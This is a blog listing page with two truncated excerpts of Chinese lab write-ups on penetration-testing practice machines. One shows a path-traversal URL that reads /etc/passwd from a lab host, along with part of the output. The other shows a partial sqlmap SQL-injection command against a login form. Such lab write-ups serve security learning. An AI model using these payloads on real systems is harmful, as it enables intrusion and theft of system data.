摘要: 文件泄露 80端口下存在文件读取 尝试读取用户列表 http://192.168.1.110/index1.php?help=true&connect=../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1 阅读全文
posted @ 2024-09-16 16:20 eth258 阅读(14) 评论(0) 推荐(0) 编辑
摘要: 这台靶机要自行配置攻击机在10.10.10.0/24网段下 sql注入 80端口login处发现可以注入的地方,sqlmap能梭出来很多东西,但是好像都登录不了,--os-shell也是没回显的 sqlmap -u http://10.10.10.100/login.php --data="emai 阅读全文
posted @ 2024-09-16 16:20 eth258 阅读(10) 评论(0) 推荐(0) 编辑